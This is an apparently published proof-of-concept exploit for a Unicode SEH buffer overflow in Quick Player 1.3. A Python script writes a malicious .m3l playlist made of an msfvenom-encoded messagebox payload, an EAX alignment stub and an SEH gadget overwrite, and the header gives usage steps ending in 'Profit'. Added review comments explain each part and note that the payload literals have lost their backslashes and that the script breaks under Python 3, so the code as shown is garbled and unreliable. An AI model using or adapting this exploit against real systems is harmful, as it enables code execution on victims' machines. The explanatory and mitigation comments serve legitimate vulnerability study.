# Exploit Title: Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)
# Date: 2020-06-05
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Quick-Player/3640-2168_4-10871418.html
# Version: 1.3
# Tested on: Windows 7

# Proof of Concept:

# 1.- Run the python script "poc.py", it will create a new file "poc.m3l"
# 2.- Open the application.
# 3.- Click on the bottom-right button with the letters "PL"
# 4.- Select the option "File"
# 5.- Click "Load List"
# 6.- Select poc.m3l
# 7.- Profit

# Blog where the vulnerability is discussed: https://whitecr0wz.github.io/posts/Exploiting-Quick-Player/
# Direct proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings6/18.gif

# msfvenom -p windows/messagebox TEXT=pwned! -e x86/unicode_mixed -f py EXITFUNC=thread BufferRegister=EAX
# Payload size: 640 bytes

# Encoded payload, assembled piecewise exactly as msfvenom's `-f py` output
# prints it. Per the command recorded in the header this is
# windows/messagebox ("pwned!") passed through the x86/unicode_mixed
# encoder with BufferRegister=EAX, 640 bytes in total. BufferRegister=EAX
# is the msfvenom option telling the encoder to assume EAX already points
# at the payload when its decoder stub runs -- that is what the
# `alignment` stub below exists to arrange.
# NOTE(review): as rendered on this page the literals contain no
# backslashes, so each "xNN" is three ASCII characters rather than one
# byte; the escape sequences appear to have been lost in transcription.
# The listing is kept byte-for-byte as given.
buf = b""
buf += b"x50x50x59x41x49x41x49x41x49x41x49x41x49"
buf += b"x41x49x41x49x41x49x41x49x41x49x41x49x41"
buf += b"x49x41x49x41x49x41x6ax58x41x51x41x44x41"
buf += b"x5ax41x42x41x52x41x4cx41x59x41x49x41x51"
buf += b"x41x49x41x51x41x49x41x68x41x41x41x5ax31"
buf += b"x41x49x41x49x41x4ax31x31x41x49x41x49x41"
buf += b"x42x41x42x41x42x51x49x31x41x49x51x49x41"
buf += b"x49x51x49x31x31x31x41x49x41x4ax51x59x41"
buf += b"x5ax42x41x42x41x42x41x42x41x42x6bx4dx41"
buf += b"x47x42x39x75x34x4ax42x37x69x5ax4bx73x6b"
buf += b"x59x49x71x64x6fx34x69x64x70x31x4ax32x47"
buf += b"x42x61x67x6ex51x35x79x43x34x64x4bx62x51"
buf += b"x4cx70x64x4bx70x76x5ax6cx64x4bx74x36x4d"
buf += b"x4cx44x4bx51x36x4bx58x64x4bx71x6ex6dx50"
buf += b"x64x4bx4dx66x4ex58x70x4fx6bx68x31x65x4a"
buf += b"x53x62x39x49x71x78x51x79x6fx58x61x53x30"
buf += b"x42x6bx52x4cx6bx74x4fx34x52x6bx50x45x6d"
buf += b"x6cx72x6bx6ex74x4cx68x33x48x69x71x4ax4a"
buf += b"x52x6bx70x4ax6ax78x32x6bx31x4ax4dx50x6a"
buf += b"x61x6ax4bx79x53x6ex54x4ex69x44x4bx6fx44"
buf += b"x54x4bx6dx31x5ax4ex6dx61x39x6fx4ex51x69"
buf += b"x30x49x6cx46x4cx45x34x45x70x52x54x7ax67"
buf += b"x35x71x66x6fx5ax6dx49x71x77x57x58x6bx59"
buf += b"x64x4dx6bx73x4cx4dx54x6dx58x32x55x59x51"
buf += b"x34x4bx4fx6ax4bx74x4dx31x6ax4bx71x56x62"
buf += b"x6bx7ax6cx70x4bx34x4bx6ex7ax6dx4cx6bx51"
buf += b"x48x6bx62x6bx5ax64x44x4bx59x71x5ax48x52"
buf += b"x69x71x34x6dx54x4bx6cx71x51x46x63x37x42"
buf += b"x4cx48x6cx69x38x54x62x69x58x65x52x69x79"
buf += b"x32x72x48x44x4ex6ex6ex4cx4ex78x6cx32x32"
buf += b"x5ax48x45x4fx49x6fx49x6fx4bx4fx53x59x71"
buf += b"x35x69x74x77x4bx7ax4fx68x4ex49x50x51x50"
buf += b"x64x47x4bx6cx6cx64x31x42x49x58x52x6ex59"
buf += b"x6fx39x6fx49x6fx62x69x71x35x7ax68x33x38"
buf += b"x30x6cx52x4cx6bx70x4ex61x71x58x4dx63x50"
buf += b"x32x4ex4ex4fx74x52x48x71x65x34x33x32x45"
buf += b"x31x62x4ex50x77x6bx62x68x71x4cx4ex44x4a"
buf += b"x6ax52x69x6bx36x6ex76x79x6fx4fx65x6ax64"
buf += b"x55x39x35x72x72x30x65x6bx56x48x77x32x6e"
buf += b"x6dx75x6cx74x47x6dx4cx4fx34x62x32x5ax48"
buf += b"x51x4fx4bx4fx49x6fx39x6fx73x38x70x6fx71"
buf += b"x68x31x48x4bx70x53x38x50x61x4fx77x43x35"
buf += b"x71x32x51x58x30x4dx30x65x72x53x53x43x6e"
buf += b"x51x57x6bx63x58x6fx6cx6bx74x6ax6ax45x39"
buf += b"x39x53x62x48x71x54x4dx51x6ex78x6dx50x61"
buf += b"x58x70x70x31x67x32x4ex51x55x4dx61x69x39"
buf += b"x72x68x6ex6cx6dx54x4bx56x33x59x48x61x4e"
buf += b"x51x49x42x4fx62x30x53x4ex71x51x42x79x6f"
buf += b"x38x50x6ex51x75x70x32x30x69x6fx32x35x4c"
buf += b"x48x41x41"

# Register-alignment stub that runs once control returns through `ret`.
# Per the inline comments it copies ESP into EAX, adjusts EAX with an
# add/sub pair (net offset 0x22002000 - 0x22001900 = 0x700), then pushes
# EAX and returns into it, so execution continues at a stack-relative
# address that should coincide with where `buf` lands. EAX is used because
# the encoded payload was built with BufferRegister=EAX (see the msfvenom
# command in the header). The interleaved "x71" bytes are marked as
# padding by the author; presumably they keep each instruction valid once
# the target widens the file contents (the title's "Unicode" case) --
# TODO confirm against the blog write-up linked above.
# NOTE(review): the 0x700 distance is specific to the author's stack
# layout on the tested build and cannot be verified from this file. Also
# note this is a str, while `buf` above is bytes; see the concatenation
# below.
alignment = "x54x71" # push esp, padding
alignment += "x58x71" # pop eax, padding
alignment += "x05x20x22" # add eax, 0x22002000
alignment += "x71" # Padding
alignment += "x2Dx19x22" # sub eax, 0x22001900
alignment += "x71" # Padding
alignment += "x50x71" # push eax, padding
alignment += "xC3" # retn

# SEH overwrite. The mona-style annotation on this line names a
# pop esi / pop ebx / ret 0x04 gadget at 0x004100f2 inside Quick Player.exe
# itself; the two byte pairs are the author's Unicode-compatible form of
# that value (presumably the first pair fills the nSEH slot and the second
# becomes the handler pointer -- TODO confirm). A fixed in-module address
# is only usable because the annotation reports ASLR: False,
# Rebase: False and SafeSEH: False for that module.
# Mitigation note: building the executable with /SAFESEH and /DYNAMICBASE
# (and running with SEHOP enabled) removes this class of gadget; the
# underlying fix is bounds checking in the playlist loader.
ret = "x71x41" + "xF2x41" # 0x004100f2 : pop esi # pop ebx # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READWRITE} [Quick Player.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.3.0.0 (C:Program FilesQuick PlayerQuick Player.exe)

# Assemble the crafted playlist and write it as poc.m3l (the file that
# step 1 of the header tells the reader to load). Layout, left to right:
# 536 filler bytes up to the handler slot (the author's offset for this
# build -- TODO confirm), the SEH overwrite in `ret`, a short
# "x41x71x41x71" spacer, the EAX alignment stub, 73 more filler bytes
# (presumably to where the stub's computed address lands), the encoded
# payload, then 200 trailing bytes -- likely just to make the record long
# enough to trip the overflow on load.
# NOTE(review): `buf` is bytes while every other piece (and the "w" text
# mode below) is str. This concatenation only works under Python 2, where
# str and bytes are the same type; under Python 3 it raises TypeError
# before anything is written. The name `buffer` also shadows the Python 2
# builtin of that name.
# NOTE(review): the file is opened without a context manager; a
# `with open(...)` block would guarantee the handle is closed even if
# write() fails.
buffer = "A" * 536 + ret + "x41x71x41x71" + alignment + "A" * 73 + buf + "A" * 200
f = open ("poc.m3l", "w")
f.write(buffer)
f.close()